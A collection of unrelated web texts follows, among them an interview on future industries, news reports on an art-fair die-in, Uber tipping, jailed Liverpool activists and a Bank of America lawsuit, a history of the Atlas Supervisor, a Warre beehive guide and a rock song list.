I believe that the centers of innovation and the wealth creation and job creation that come from that will be in the more open societies for the industries of the future. People conglomerating around what will probably be ten to 15 major centers over the next fifteen years. We already see this in development now. The more open societies will be those that compete and succeed most effectively.
“The more open societies will be those that compete and succeed most effectively.”
Looking at this on an individual level, it's going to be a terrible time to be mediocre at your job if you're in a high-cost labor market. It's an absolutely brutal truth. When people in Baltimore are competing against people in Bangalore, not just based on cost of labor but also quality of labor, which is now increasingly going to be the case, being more middle class or working class in the United States or Western Europe isn't going to mean you're starting life on second base to the degree that it did in the past.
You've got to be a committed lifelong learner. You've got to be adaptable. Otherwise you're going to be left behind even if your country is producing substantial growth.
Knowledge@Wharton: In the last chapter of the book, you share advice for parents. Even if they are decades away from college or a few years away, what do you suggest? How do you guide them? How can they adjust to this new type of economy? You have some interesting advice and part of it's with languages. The other interesting part was just the idea that it's more important than ever to have stamps on your passport, which is something I never experienced as a kid and something that definitely got me thinking, “Well, this is something I need to make a point of making sure my daughter does.”
Ross: There was a World Economic Forum study that said that for children entering preschool today, 65% of the job types that will exist when they graduate from college don't exist today. What that means is that we aren't preparing our kids for specific jobs. Rather what we have to do is develop a set of skills they can then map into job types that we don't even know what they are right now.
“The 21st century is a terrible time to be a control freak.”
The last chapter of The Industries of the Future [is] called “The Most Important Job You'll Ever Have.” The most important job you'll ever have [is] being a parent. Without pretending to be a parenting guru myself … I interviewed the scores of people who have been very successful in business, and said, “What are the skills and attributes that today's kids need? I'm all in favor of language learning — for tomorrow's economy?”
There are a handful lesson in there from foreign language-learning to interdisciplinary learning to making sure that kids are as multiculturally fluent as possible because they are going to be working in a world where the frontier economies are becoming developing economies and the developing economies are becoming developed economies. So it's going to be a little bit of a tricky world for kids my [children's] age — they're 13, 11 and nine — when they enter the workforce. It's never too early to begin to prepare them for that.
Knowledge@Wharton: When you talk about languages, you also talked a lot about preparing them for technological language – code, including .html, Python — in addition to a foreign language….
I'm all in favor of language learning — foreign languages and computer languages. Even if the computer languages that kids are learning are not necessarily those that'll be used in 15 years, it still teaches you a way of thinking. It teaches you a way of problem-solving and an above-average coder has got a couple of decades' worth of employment in front of him.
Knowledge@Wharton: If you are early- to mid-career or somebody who has built a career on one of the old innovations of the past, how do you prepare for the future? How can you take this book and really use it? What would your advice be to older folks?
Ross: I think that anybody from middle schoolers to people toward the end of their professional careers, hopefully can draw something from The Industries of the Future. One of the things that I would simply say is I'm such an evangelist for lifelong learning. The idea that [learning] somehow stops in your 40s or your 50s, I simply don't buy or buy into…. I say the 21st century is a terrible time to be a control freak. One of the key things is to give up on the kind of control that you're most comfortable with and begin to understand that a lot of the ground shifting under your feet is going to shift whether you like it or not and to understand and accept that we're going to be living in a world of ever-faster‒paced change.
Photo by Victoria L. Valentine
YESTERDAY AFTERNOON, A GROUP OF ARTISTS staged a die-in at the Armory Show in New York. About a dozen people chanted “I can't breathe” and then they fell to the floor at Pier 94 where the international art show has been open to the public since Thursday.
According to the New York Times, the demonstrators were members of Artists for Justice for NYC, a group formed after a grand jury declined to indict Daniel Pantaleo, the police officer who used a chokehold on Eric Garner shortly before he died July 17, 2014.
I was at the Armory Show within earshot when the performance got underway. I quickly went to watch what was happening and observed the response of Armory Show officials.
The unsanctioned public art performance began Saturday, March 7, a few minutes after 3 p.m., gaining the attention of fair goers in the vicinity who formed a circle around the group. The demonstration began with a chorus of “I can't breathe,” the words uttered by Garner as he was being choked. Then Christian Felix recited a lengthy series of phrases, attributed to Garner, that were printed on a poster. The words on the poster began, “I didn't do shit. Minded my own business.” And continued with: “Every time you see me you wanna mess with me. I'm tired of it. It stops today.”
The words on the poster began, “I didn't do shit. Minded my own business.” And continued with: “Every time you see me you wanna mess with me. I'm tired of it. It stops today.”
Christian Felix, a member of Artists for Justice NYC, recites the words of Eric Garner. | Photo by Victoria L. Valentine
As Felix spoke, other members of the group stood with both of their hands holding their throats. When he finished his statements, the racially diverse group fell to the floor. Next, Shyvonne, one of the performers who have long, sea foam green braids, stood and began to sing.
The demonstration brought contemporary social justice issues to the attention of the international art world audience attending New York's oldest and largest art fair. The group's message addressed police brutality, strained relations between police and communities of color across the country, and emphasized that black lives matter in a venue where a coterie of critically recognized black artists has gained traction and commercial success but the racially and culturally charged issues raised in some of their work earns little hearing.
A coterie of critically recognized black artists have gained traction and commercial success but the racially and culturally charged issues raised in some of their work earns little hearing.
One demonstrator, Patrick Waldo, told the Times that participants chose the art fair for a performance with an eye toward reaching an audience that might be sympathetic but that probably was not typically involved in protests. “We're trying to get our message out to a crowd that is historically out of touch with the struggle of black America,” he said.
The action drew a crowd of more than 100 as the performance unfolded just inside the entrance of the fair in front of the Artsy booth, a bar and lounge area where Hank Willis Thomas has an installation. Thomas, whose work examines representation, cultural coding in advertising, and often utilizes text, created an installation that draws on an elusive play of words and ultimately spells out “Art imitates life imitates ads.”
At left, a security guard (in the red tie) stands before the crowd as Christian Felix leads a demonstration to raise awareness about Eric Garner's death and strained police-community relations. | Photo by Victoria L. Valentine
From the outset, Armory security attempted to interrupt and stop the performance, and then seemed to be unsure whether it was an official part of fair programming. Soon a woman showed up bearing a clip board and what looked like a fair badge. She appeared to communicate with security about whether or not the performance was authorized.
The demonstration lasted about 10 minutes. Due to its brevity and the confusion about its merits, it appeared that Artists for Justice NYC was able to present its entire performance.
Here is the full text of the poster from which Felix was reading:
I didn't do shit. Minded my own business. A fight break out and I stop it. And all of a sudden you come running up on me. The people that's fighting just walk away.
Are you serious. I didn't do anything; What I'd do?
No, I don't have my ID on me.
Take me back for what? I didn't sell anything. I did nothing.
We're sitting here the whole time minding our business. What're you talkin about? Who did I sell what? Who did I sell a cigarette to? To who?
Easy way or hard way FOR WHAT?
Every time you see me you wanna mess with me. I'm tired of it. It stops today.
No – whatchu grabbing me for? Everybody sees I ain't Everybody see I ain't done nothing. Everybody standing here could tell you; I ain't done nothing. I did not sell anything.
BECAUSE every time you see me you wanna harrass [sic] me. You wanna stop me. Talkin bout I'm sellin cigarettes. I did not sell anything.
I'm minding my business officer. I'm minding my business; please just leave me alone.
I told you the last time: Please just leave me alone.
Please don't touch me. Do not touch me.
— Eric Garner, July 17, 2014
Noah Horowitz, the executive director of the Armory Show, told the Times that the art fair welcomes visitors from far and wide, but emphasized the following in an email statement: “As a matter of policy and due to a combination of both curatorial and safety concerns, any performance or action that has not been preapproved has to be asked to leave. This is precisely what happened at the fair this afternoon.”
Complex reports that as they were being escorted out, the group filed through the exit singing the civil rights folk song, “Keep Your Eyes on the Prize.” CT
TOP IMAGE: Members of Artists for Justice NYC stage a die-in at the Armory Show on Saturday, March, 7, 2015. | Photo by Victoria L. Valentine
UPDATE: WATCH VIDEO of the demonstration. | Video by OrderVision
A group member picks up the poster Christian Felix was reciting from as fellow demonstrators grasp their throats. | Photo by Victoria L. Valentine
Christian Felix lies on the floor during die-in demonstration. | Photo by Victoria L. Valentine
Shyvonne, standing in background, sings as fellow members of Artists for Justice NYC stage a die in at the Armory Show. | Photo by Victoria L. Valentine
By Ian Cottam, IT Services Research Lead, The University of Manchester.
The next post in my series on heroes of software engineering focuses on David Howarth – and the Atlas Supervisor. This software system was so good and revolutionary that Per Brinch Hansen described it as:
“the most significant breakthrough in the history of operating systems”
What came first: the chicken or the egg? In the computer world one might ask “what came first: the compiler or the operating system?” (You might also argue that the question is irrelevant as it was a while before high level languages were suitable for such machine-level work as writing operating systems.) In my case, and I suspect many others of my age or older, it was the compiler. My first computer was the Elliott 803B, which came with no operating system whatsoever but did have an Algol 60 compiler. The compiler was just loaded into the empty memory and ran on the raw hardware - that was once the norm.
Then in the early 1960s along came a computer – the Atlas – that was not just a tiny bit faster than the previous generation, it was a hundred times faster! That was one of the factors that led its co-designers (first Manchester University and then joined by the commercial company Ferranti) to the conclusion that an operating system was needed: they called it the Supervisor. Many of today's terms for things in the computing world were different in the 1960s, especially on this side of the Atlantic. I already wrote memory above when I would have written store back then.
Today's hero of software engineering, David Howarth, joined Ferranti when the work on the hardware and software for Atlas had already started. He tells a story (in How We Made Atlas Useable) of how his boss suggested he work on Tony Brooker's Compiler-Compiler (chicken-egg time again?). Howarth soon saw what would be the key to Atlas's success, and moved to work on the Supervisor. Howarth's boss argued that Tom Kilburn and his team at Manchester had made the hardware so good that most of the work of an operating system – or Supervisor – was done. Of course, he was wrong about the software side of things, but right about what an advance Kilburn's hardware was.
A small team worked on the Supervisor. Two of Howarth's colleagues were Bruce Payne (Manchester University) and Mike Wyld (Ferranti). It was soon clear that Howarth was the leading light, and I have never heard anyone from those days dispute that. One anecdote is told by John Crowther, who was a senior maintenance engineer supporting the two or three Atlas computers. Crowther regularly received updates (fixes and improvements) to the Supervisor from the development team: Howarth's contributions worked 90% of the time - no one else beat 60%. When writing in a code that is one step away from machine code, and you have no real opportunity to test, a 10% failure rate in your updates is staggeringly good. You can see John Crowther, and many other engineers, on the excellent video Atlas 50 years on made by Google last year.
The list of features that David Howarth and his team gave us is amazing, and they feature in all modern operating systems to this day. Virtual Memory (VM) via demand paging was born with Atlas and made to work via the Atlas Supervisor. VM was actually a term that IBM would later use: it was known to the Atlas team as a one-level store. The small but fast memory was logically extended by an external drum store, but paging hardware and VM support in the Supervisor made it transparent to user programs. Interestingly, one VM design was used just for the pages of the Supervisor and a separate one for user programs. I'm not sure why that was done, and it seems to be accepted now as an unnecessary complication. (I'd be pleased to hear from any Atlas folks who might read this.)
How about multiprogramming? The – again, now common place – idea that the operating system can switch its processor from one program to another so quickly that it gives the impression that all the programs are running simultaneously. System calls and library calls via what were termed extracodes. These are unimplemented machine instructions that cause a trap or interrupt into the Supervisor where they are actually implemented by appropriate routines (e.g. for data transfers). One Atlas feature is not so common in these highly interactive days: the notion of spooling data from slow devices to fast[er] ones before running a job.
As a software engineer, I've always felt that my profession got less credit than our hardware or electrical engineering partners. I think in David Howarth's case this was amplified by the 100x increase in raw processing power Atlas could claim over what came before. I hope inclusion in my small set of software heroes is welcomed, these 50 years on.
Note
On a personal note: I never got to use an Atlas, although I did visit one at London University (one that John Crowther saved from a flood , but that's another story). It was around 1969 when I was debating skipping higher education and had applied for a job as an Atlas Operator. That same year, I got a book from the town library on Atlas Autocode and taught myself to write some simple numerical procedures. I don't count that as using Atlas or real programming, but it was fun and I have never looked back, thanks to my lifelong love of compilers (thank you Tony Brooker) and of course operating systems (thanks to David Howarth).
A man exits the Uber offices in Queens, New York, U.S., February 2, 2017. REUTERS/Brendan McDermid
SAN FRANCISCO (Reuters) - Ride-services company Uber Technologies Inc may be required to provide passengers a way to tip their drivers, despite its longstanding resistance, if a plan by New York City's taxi regulator is implemented.
The New York City Taxi and Limousine Commission said on Monday that it plans to propose a rule no later than July that would require all for-hire vehicles to allow passengers to tip drivers using the same method they use to pay for the ride. In Uber's case, this would involve adding a tipping feature within the its smartphone app.
The commission said its proposal is a response to driver concerns over falling wages, as Uber has reduced fares in New York City and across the country. Tips could help boost drivers' income.
Uber has said previously it opposed tipping because it was an inconvenience to passengers and slowed the transaction between rider and driver.
“I found myself having to work longer hours away from my family to earn the same money,” Luiny Tavares, who has driven for Uber for five years, said on a call with reporters that was organized by the Independent Drivers Guild.
The guild, set up last year to advocate for drivers, started a campaign last summer to pressure Uber to add a tipping feature in its app. Uber was “unable to move on the option,” said guild founder Jim Conigliaro, so the guild brought the issue to the taxi commission.
Any tipping proposal faces a protracted process before it becomes a rule Uber must follow. The taxi commission has the authority to initiate rulemaking on its own, but rules must be certified by city legal authorities. There is also 30-day public comment period and public hearing, and a board of commissioners votes on the final rule.
“We have not seen the proposal and look forward to reviewing it,” said Uber spokeswoman Alix Anfang. “Uber is always striving to offer the best earning opportunity for drivers and we are constantly working to improve the driver experience.”
Adding a tipping feature to Uber's app would remove one significant difference between Uber and its chief U.S. competitor, Lyft. Lyft has a smaller market share but is the preferred service of many drivers because it allows tipping through the smartphone app. Lyft said in March that its drivers have earned more than $200 million in tips since the company's founding.
A Warre hive is a vertical top bar hive that is simple to build and easy to use. The cost is about one-third to one-fourth the cost of one standard ten frame Langstroth hive. A Warre (pronounced war-ray) hive is simple to manage and maintain. Also known as tiered or supered top bar hives, a vertical top bar hive is such as the Warre hive is friendly to the bees since they are allowed to draw out their own comb. The hive is commonly under supered (nadired) which means the new hive boxes are added to the bottom and not the top of the hive. This promotes the bees natural tendency to build down ensuring a hive environment that is healthier and better suited to their own needs.
Characteristics of the Warre hive
Warre hives have a simple hive box with no frames. The bees draw down their own comb from top bars affixed to each box. The quilt provides a layer of insulation to the hive. It sits under the roof on top of the uppermost box, as you can see below.
Warre hives are easy to build from materials available at your building supply shop. The Warre hive is designed so that it will not take enormous amounts of time out of your busy schedule. In short, the Warre Hive is a good solution for those who are interested in keeping bees simply, naturally and wholesomely without harsh chemicals or medications.
Description of the Warre hive
The Warre Hive comprises tiers of identical boxes fitted with top-bars, but no frames. Its essential design and usage features can be summarised as follows:
Image and description courtesy of the Warre English Portal
hive-body box internal dimensions 300 x 300 x 210 mm, with projecting handles
eight 36mm centred 24mm wide top-bars resting in rebates in each box (NO FRAMES)
wax starter strips under each top bar (NO FOUNDATION)
flat floor, notched with a 120mm wide entrance, alighting board
coarse weave cloth covering the top-bars of the top box
100 mm high ‘quilt' boxed with wood, filled with straw, sawdust, wood shavings etc., retained with cloth
gabled roof containing a ventilated ‘loft' and separated from the quilt by a mouse-proof board
Here are some more features of the Warre Hive:
the bees build natural comb in the first (top) box and extend downwards into further boxes
new boxes are added at the bottom
one or more boxes of honey are harvested from the top after the main flow
the bees winter on two boxes of comb containing a minimum of 12 kg stores (France)
honey is harvested by draining, or by centrifuging combs in baskets
at the spring visit, the hive is expanded by one or more boxes, containing with starter strips or comb
History of the Warre hive
The Warre Hive (also known as the People's Hive) was developed in France by Emile Warré (1867-1951). Warré developed the People's Hive after experimenting with over 350 hives of various designs and types. It was his goal to find a hive system that was simple, natural, economical, and bee-friendly. The result was the People's Hive (Ruche Populaire). He outlined the construction and operation of the hive in his book “Beekeeping for All.” This book is available in English as a free download. If you are interested, English Plans for the Warre Hive are also available.
Warré is not alone in his findings, though. In 1783, a German beekeeper named Johann Ludwig Christ developed a beekeeping system almost identical to that of Warre. And in Japan, many beekeepers still employ a similar system of beekeeping that has been in constant use since the Edo period of Japanese history (A.D.1586 to A.D.1911).
I want a Warre hive…Where Can I Get One?
There are actually a number of places you can get pre-built warre hives these day's. A couple that come to mind are The Warre Store and Beethinking. If you don't live in the US then you might want to take a look at Herr Thuminger and Associates. They are located in Vienna, Austria and can deliver ready made hives and hive parts to most of Europe and the UK. If you are a do-it-yourself kind of person then you can build your own, or download the plans and have a carpenter build a hive for you.
More Info
Check out the Warre English Portal for more info.
Advertisements
In this July 4, 2012 file photo, fireworks burst over Yokota Air Base, Japan during "Celebrate America." Officials said U.S. military isntallations in Japan will not have firework displays or band performances in upcoming Independence Day celebrations "demonstrate solidarity and our unwavering respect" for Rina Shimabukuro, the slain 20-year-old Okinawan woman allegedly raped and murdered by Kenneth Franklin Gadson.
YOKOTA AIR BASE, Japan — The rockets' red glare will be absent from Independence Day celebrations at U.S. military bases in Japan this year.
The decision to go low key for the most patriotic American holiday — major live concerts were banned, too, though some small musical ensembles are expected to perform — is an extension of the monthlong “period of unity and mourning” that was declared on Okinawa in sympathy over the slaying of a 20-year-old Okinawa woman that has been linked to a U.S. civilian base worker.
The impact of Rina Shimabukuro's brutal death, in combination with other recent crimes by U.S. servicemembers, has spread to the Japanese mainland and become a political hot potato that tainted President Barack Obama's visit to Japan late month and sparked apologies by top U.S. military leaders and Ambassador Caroline Kennedy.
It also has led to liberty and alcohol restrictions for U.S. troops and a series of anti-base protests. An estimated 65,000 people attended a demonstration Sunday in Okinawa to demand all Marines leave the island. Another 7,000 protested outside the Japanese parliament building in Tokyo, focusing on Prime Minister Shinzo Abe for his moves to expand the Japanese military's role beyond self-defense.
U.S. Forces Japan spokesman Air Force Lt. Col. Kenneth Hoffman said Wednesday that Independence Day events were being scaled back Japan-wide "to demonstrate unwavering respect for the loss our friends on Okinawa experienced," so fireworks displays and concerts have been canceled.
The announcement follows Saturday's statement by III Marine Expeditionary Force Lt. Gen. Lawrence D. Nicholson, the top U.S. military official on Okinawa, that it was "probably still too soon" for celebratory Independence Day events there.
AmericaFest, which had been scheduled July 2 at Kadena and was to feature R&B singer Usher, has been canceled and the Futenma Flightline Fair was postponed to September.
The USFJ commander, Lt. Gen. John Dolan, informed all commanders in Japan on June 14 about his decision to cancel fireworks this year.
The Independence Day celebrations normally draw large crowds, including Japanese guests, for live music and American fast food, capped by extensive fireworks displays.
But the May 19 arrest of Kenneth Franklin Gadson, a former Marine who works at Kadena Air Base, left officials scrambling to show sympathy for Shimabukuro's death. Gadson has been charged with illegally disposing of her body, and police have recommended additional charges of murder and rape resulting in death.
In addition, Seaman Apprentice Justin Castellanos pleaded guilty May 27 to raping an intoxicated Japanese woman at a Naha hotel, and Okinawa military officials tightened a curfew and added other liberty restrictions the same day as part of the “period of unity and mourning.”
Less than a week later, Petty Officer 2nd Class Aimee Mejia, 21, assigned to Kadena, was arrested on suspicion of drunken driving after crashing into two cars by driving the wrong way on an Okinawa highway.
That led the Navy to impose a ban on nonessential off-base travel and alcohol consumption by sailors — even at home — for several days.
Tom Costello, a civilian defense contractor working on Yokota Air Base in Tokyo, said that while he wasn't particularly upset that events were being scaled back, "I like the fireworks like everyone else and I would have come out to watch if they had them."
Hoffman said there would still be barbecues, sporting events and open houses at many bases.
Yokota will hold a "Celebrate America" event on Friday, July 1, at the Samurai Training Grounds, 374th Airlift Wing spokesman Capt. Nathaniel Roesler said. Yokota's website says it will include cash and prize giveaways, a 70-foot inflatable zip-line, go-karts, face painting, bouncy castles, pony rides and a petting zoo.
Other Independence Day events at the base include a fun run, basketball shootout, baking contest and a car show, according to the website.
"We are proud of America's rich heritage and look forward to sharing our Fourth of July traditions with our Japanese friends and neighbors," Roesler said.
robson.seth@stripes.com
A Day in the Life
a hard day's night
Across the Universe
ALL I'VE GOT TO DO
All My Loving
All Together Now
And I Love Her
Back In The USSR
Because
Being For The Benefit Of Mr Kite
A Great Day For Freedom by Pink Floyd
A Kind Of Magic by Queen
A Saucerful of Secrets by Pink Floyd
All Along The Watchtower by Bob Dylan
Angel by Jimi Hendrix
Angie by The Rolling Stones
Another Brick In the Wall by Pink Floyd
Another One Bites The Dust by Queen
Armenia City In The Sky by The Who
Atom Heart Mother by Pink Floyd
Baba O'Riley by The Who
Ball and Biscuit by The White Stripes
Beast of Burden by The Rolling Stones
Behind Blue Eyes by The Who
Black Math by The White Stripes
BOHEIMIAN RHAPSODY by QUEEN
Bohemian Rhapsody by Queen
Bold As Love by Jimi Hendrix
Brain Damage by Pink Floyd
Breathe by Pink Floyd
Can't Help Falling In Love by Elvis Presley
Castles Made of Sand by Jimi Hendrix
Champagne Supernova by Oasis
Change The World by Eric Clapton
Cocaine by Eric Clapton
Comfortably Numb by Pink Floyd
Communication Breakdown by Led Zeppelin
Crazy Little Thing Called Love by Queen
Dead Leaves And The Dirty Ground by The White Stripes
Desperado by Eagles
Dogs by Pink Floyd
Don't Be Cruel by Elvis Presley
Don't Go Away by Oasis
Don't Look Back In Anger by Oasis
Don't Stop Me Now by Queen
Don't Think Twice It's Alright by Bob Dylan
Down By The River by Neil Young
Echoes by Pink Floyd
Eclipse by Pink Floyd
Fell In Love With A Girl by The White Stripes
Gimme Shelter by The Rolling Stones
Good Company by Queen
Good Old Fashioned Lover Boy by Queen
Goodbye Blue Sky by Pink Floyd
Hey Joe by Jimi Hendrix
Hey You by Pink Floyd
High Hopes by Pink Floyd
Hotel California by Eagles
Hound Dog by Elvis Presley
I Can See For Miles by The Who
I Can't Explain by The Who
I Can't Help Falling In Love by Elvis Presley
I Shot the Sheriff by Eric Clapton
I Want to Be the Boy to Warm Your Mother's Heart by The White Stripes
I Want To Break Free by Queen
I'm Lonely by The White Stripes
Icky Thump by The White Stripes
If I Can Dream by Elvis Presley
Imagine by John Lennon
In The Cold Cold Night by The White Stripes
In The Flesh by Pink Floyd
Jealous Guy by John Lennon
Jumpin' Jack Flash by The Rolling Stones
Killer Queen by Queen
Knockin' On Heaven's Door by Bob Dylan
KNOCKING ON HEAVEN'S DOOR by Eric Clapton
Lay Down Sally by Eric Clapton
Lay Lady Lay by Bob Dylan
Layla by Eric Clapton
Let It Grow by Eric Clapton
Light My Fire by The Doors
Like A Rolling Stone by Bob Dylan
Little Ghost by The White Stripes
Little Room by The White Stripes
Little Wing by Jimi Hendrix
Live Forever by Oasis
Lonely Stranger by Eric Clapton
Lost For Words by Pink Floyd
Love Her Madly by The Doors
Love Me Tender by Elvis Presley
Love Street by The Doors
Mad The Swine by Queen
My Doorbell by The White Stripes
Need Your Loving Tonight by Queen
Offend In Every Way by The White Stripes
One Of My Turns by Pink Floyd
One Rainy Wish by Jimi Hendrix
Paint It Black by The Rolling Stones
People Are Strange by The Doors
Pigs Three Different Ones by Pink Floyd
Pinball Wizard by The Who
Play The Game by Queen
Pretending by Eric Clapton
Quadrophenia by The Who
Riders On The Storm by The Doors
Run Like Hell by Pink Floyd
Satisfaction by The Rolling Stones
Scandal by Queen
Seven Nation Army by The White Stripes
Seven Seas of Rhye by Queen
Sheep by Pink Floyd
Shine On You Crazy Diamond by Pink Floyd
Somebody To Love by Queen
Songbirds by Oasis
Spread Your Wings by Queen
Stairway to Heaven by Led Zeppelin
Stay by Pink Floyd
Stay Young by Oasis
Stop Crying Your Heart Out by Oasis
Sunrise by The Who
Suspicious Minds by Elvis Presley
Tangerine by Led Zeppelin
Tears In Heaven by Eric Clapton
Ten Years Gone by Led Zeppelin
Thank You by Led Zeppelin
That's Alright by Elvis Presley
The Denial Twist by The White Stripes
The Final Cut by Pink Floyd
The Great Gig In The Sky by Pink Floyd
The Hardest Button to Button by The White Stripes
The Importance of Being Idle by Oasis
The Rose by Janis Joplin
The Show Must Go On by Queen
The Song Is Over by The Who
The Thin Ice by Pink Floyd
The Union Forever by The White Stripes
Time by Pink Floyd
Time Is On My Side by The Rolling Stones
Tumbling Dice by The Rolling Stones
Under pressure by Queen
Under pressure P2 by Queen
Us and Them by Pink Floyd
Waiting For The Sun by The Doors
We Are The Champions by Queen
We Will Rock You by Queen
Welcome to the Machine by Pink Floyd
What Do You Want From Me by Pink Floyd
White Moon by The White Stripes
Who Are You by The Who
Wild Horses by The Rolling Stones
Wish You Were Here by Pink Floyd
Won't Get Fooled Again by The Who
Wonderwall by Oasis
Wot's Uh the Deal by Pink Floyd
You Can't Always Get What You Want by The Rolling Stones
You Don't Know What Love Is by The White Stripes
You Look Wonderful Tonight by Eric Clapton
You Were Always On My Mind by Elvis Presley
You're My Best Friend by Queen
New Skyline Pigeon by Elton John
You Worry Me by Nathaniel Rateliff and The Night Sweats
Swan Lake Suite by Pyotr Ilyich Tchaikovsky
Exit Music - For a Film by Radiohead
Mopedbart by Hubbabubbaklubb
24 Hours by Mat Zo
Hold On by Nano
Storm by Victor Crone
Writer in the Dark by Lorde
– September 20th, 2015
Five Activists who had occupied Liverpool's old Bank of England building to provide shelter and feed the city's homeless people have been jailed for almost 3 months each [see prisoner details at bottom of article].
The Love Activists moved into the unoccupied building in the middle of April to set up a support centre for Liverpool's homeless people, incorporating places to sleep, an advice centre and a street kitchen, from where they were evicted in the early hours of 12 May and the homeless activists arrested.
The defendants were charged in relation to the occupation of the old bank building in Castle Street, Liverpool city centre, as part of a protest over lack of support for the homeless and government austerity.
John Hall, 50; John Rice, 22; Chelsea Stafford, 19; James Jones, 20, and James Allanson, 20, all pleaded guilty to trespass while a possession order was in place.
The court also heard a minimum of £91,573 was spent in policing the protest, while the operation to arrest the protesters cost around £27,000. Almost all this budget was used in paying overtime to officers so as to create a heavy oppressive police presence around the building where they used a dispersal order to clear supporters away from the building and, the activists said, were refusing to allow supplies to be taken into the building.
The Love Activists' occupation had growing support among residents and businesses of Liverpool. A poll on the Liverpool Echo website at that time gave a majority of those asked believing the group should stand firm against their eviction order.
The five defendants, who were all of ‘no fixed abode', were part of a much larger group trying to assist the local community, many of which who were also homeless, who had occupied the bank, using the law that ‘squatting' or using empty commercial premises to live in is still not a crime.
Prosecutor Miss Rowan said during the protest large numbers of people congregated outside, which led to an “influx of vagrants and rough sleeping” in the area.
A defending lawyer said in their favour “In a time of austerity when billions have been spent on banks, services for the homeless are being cut… these are conscionable people who have chosen to engage in an act of civil disobedience”
Though it appears the appeals for clemency fell on deaf ears as District Judge Andrew Shaw in summing up declared:
“Their selfish actions cost this community highly both financially and also by disrupting the day-to-day life of the city and its people.“
Supporters of the men were further incensed when it was revealed that earlier in the same court a paedophile John Evans, 35, on whose computer and external hard drives were found a “colossal” total of 28,000 child porn images was just sentenced to a three year community order.
There were disturbances inside and outside the court as the mens sentences were handed down.
One man in his late fifties was dressed in a superman costume as he shouted at officers: “Feeding the homeless is not a crime! Homeless not banks!”
They waved hand-painted banners saying: “Resisting homelessness” and “Homes not Banks”.
Two further people were arrested during the protest which spilled over from the court area onto the Strand behind, and at once point blocked the southbound carriageway during rush hour.
During their short time in the building they managed to create mass attention locally and nationally to the spiralling homeless situation in the City, whilst trying trying to provide basic essential items to Liverpool's homeless such as shelter, food and companionship.
Leading Liverpool charity the Whitechapel Centre said whilst the occupiers were resisting attempts to move them on, provision for the city's homeless was “stretched”. David Carter, chief executive of The Whitechapel Centre, told the Liverpool ECHO the number of beds for those without homes in the city was “stretched”
The Whitechapel Centre alone had seen a 32% increase over the last three years in those needing its help and in the previous year worked with 2,485 people who were either homeless or at risk of becoming homeless
Mr Carter said: “Our outreach team have been in regular, daily contact with the Love Activists at the former Bank of England building on Castle Street, offering our services to anyone who is homeless or concerned about their housing situation. The Love Activists have provided access so that we have been able to undertake assessments of need and offer appropriate support and accommodation solutions.”
The Whitechapel Centre is an independent charity working with people who are homeless, socially excluded or in housing poverty.
A statement released from the Love Activists: after the jailing of the five sadly recognised “It is a difficult time for all Love Activists, and the family and friends of our activists in custody tonight.
Love Activists are outraged and disgusted by the sentences handed out to the Love Bank Five today. The judge today showed a clear prejudice against the activists, as they openly applied their personal opinions to legislative law: they declared that it is ‘selfish' for someone to openly help homeless people or indeed be homeless yourself.
They took into account the alleged damage caused to the building, of which, of course, there was no evidence that the Love Bank Five had anything to do with. All five did, in fact, state that they were ‘appalled' by the damage others caused in the building. The Judge implied that they were somehow responsible by daring to provide a sanctuary and safe haven for damaged and vulnerable people in society.
We, Love Activists, stand in full solidarity with the Love Bank Five, and strongly oppose the harsh sentencing imposed today by a judge clearly lacking impartiality. We fully support any campaign to see the unjust sentences overturned.”
We at Streets Kitchen agree with their sentiment.
From Manchester to London and now in Liverpool, it's very evident that there is what can be seen as a class war on the poor and activists. Homeless activists who are just merely trying to assist others, helping those that they can who are just that little less fortunate than them.
In Manchester we are seeing people facing criminal charges and potential custody for living in or supporting and assisting homeless camps, in London we have seen people facing prosecutions just for feeding homeless people.
Now in Liverpool we have the situation where five decent innocent people who utilised a longtime empty building just to shelter people from the streets and feed them are in jail. It's insane.
There are over one million empty properties that overnight could easily house everyone who needs or wants shelter. Theres billions and billions of pounds that are owed by the tax avoiding companies, there's an economic crisis created by the real criminals in the banking system and those in power who let them ride roughshod freely over any country they wish to. The real criminals are those in power who allowed this, whilst people die on our streets and children go hungry.
If we are to be criminalised for being ‘selfish' and demanding the impossible, so be it..
We know there is a simple solution to homelessness.. Housing First is a successful proven model.
We encourage more people to get involved now in helping others, after all they can't jail us all!
There will be further details of solidarity actions and urgent prisoner support coming soon with those whose only crime was to care and do something about it… You can show your support by emailing them details below…
[From Streets Kitchen on September 18th]
One man is suing Bank of America after the company allegedly handed over his account to another customer with the same name.
Konstantinos Alexopoulos opened up an account at Barnett Bank -- which was ultimately acquired by BofA -- in 1992 when he came to the United States for college, the Tampa Tribune reports. He returned to Greece in 1997 and continued making deposits to the account totaling $59,000 in 2003, but when he checked his balance in 2005, it had dwindled to $1,400.
Alexopoulos alleges that's because the bank mixed up his account with that of another man of the same name, who subsequently withdrew the money, according to the Tribune.
If Alexopoulos' claims hold up in court, it would be far from the first BofA mix-up. The bank also gave the same 10-digit account number to two customers in Riverside, California, according to a July report by the Los Angeles Times. One of the customers -- an 88-year-old World War II veteran -- ended up losing out on $30,000 worth of social security payments as a result. After an investigation by the San Bernardino County district attorney's office, he ultimately got the money back.
In September it was reported that a Hawaiian woman sued BofA after she received computer-generated calls as often as every 15 minutes from the bank over a missed mortgage payment, while she was grieving for her recently deceased husband.
BofA has also had some notable blunders issuing foreclosures. The bank threatened to foreclose on a Utah couple's home earlier this month, after they had already sold it. The bank also tried to foreclose on a home last month that was destroyed by Hurricane Ike in 2008. In addition, the bank asked a Massachusetts man in August to pay a $0.00 balance to stave off foreclosure.
The account and foreclosure mixups likely aren't the worst public relations disaster for BofA in recent months. The bank backtracked from a plan to start charging customers $5 to use their debit cards after consumers and lawmakers blasted the proposal.
UH coordinator Todd Orlando expected to leave for Texas
As new University of Houston coach Major Applewhite begins to fill out his coaching staff, it appears he will need to find a defensive coordinator.
Although not official, Todd Orlando is expected to join Tom Herman at Texas, board of regents chairman Tilman Fertitta said Friday.
Earlier Friday, Houston athletic director Hunter Yurachek said Orlando has a "standing offer" to remain with the school.
"(Todd is) a great guy," Fertitta said. "I wish him the best of luck. I would have done anything to keep him."
Yurachek informed Orlando of the school's decision Friday morning.
"Todd Orlando has been unbelievable," Yurachek said. "Our program has not missed a beat under his leadership. He was in this process to the very end."
Orlando, who was named interim coach after Herman's departure, will remain with the Cougars through the Dec. 17 Las Vegas Bowl.
"He's committed to the young men in this program," Yurachek said. "That's the true testament to who he is both as a person and a football coach."
